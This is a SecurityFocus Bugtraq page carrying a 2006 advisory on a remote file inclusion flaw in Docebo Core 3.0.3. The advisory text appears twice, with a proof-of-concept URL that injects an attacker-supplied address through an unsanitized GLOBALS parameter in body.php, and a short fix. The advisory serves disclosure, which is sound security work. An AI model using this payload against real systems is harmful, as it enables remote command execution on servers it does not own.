Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Docebo Core 3.0.3, Remote command execution
Jun 09 2006 04:52AM
Federico Fazzi (federico autistici org)
-----------------------------------------------------
Advisory id: FSA:008
Author: Federico Fazzi
Date: 09/06/2006, 6:44
Sinthesis: Docebo Core 3.0.3, Remote command execution
Type: high
Product: http://www.docebolms.org/
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in body.php,
include_once($GLOBALS['where_framework']."/lib/lib.upload.php");
The users can include a remote file because
the $GLOBALS['where_framework'] isn't sanitized
2) Proof of concept:
http://example/[dc_path]/addons/mod_media/body.php?GLOBALS[where_framewo
rk]=[cmd_url]
3) Solution:
include file where are declare $GLOBALS[*]
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Advisory id: FSA:008
Author: Federico Fazzi
Date: 09/06/2006, 6:44
Sinthesis: Docebo Core 3.0.3, Remote command execution
Type: high
Product: http://www.docebolms.org/
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in body.php,
include_once($GLOBALS['where_framework']."/lib/lib.upload.php");
The users can include a remote file because
the $GLOBALS['where_framework'] isn't sanitized
2) Proof of concept:
http://example/[dc_path]/addons/mod_media/body.php?GLOBALS[where_framewo
rk]=[cmd_url]
3) Solution:
include file where are declare $GLOBALS[*]
[ reply ]